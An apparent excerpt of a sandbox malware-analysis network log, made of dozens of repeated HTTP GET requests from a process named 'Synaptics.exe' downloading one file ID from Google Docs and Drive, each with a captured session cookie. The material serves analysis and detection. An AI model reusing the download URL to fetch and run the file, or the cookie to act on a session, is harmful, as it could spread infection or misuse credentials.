                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
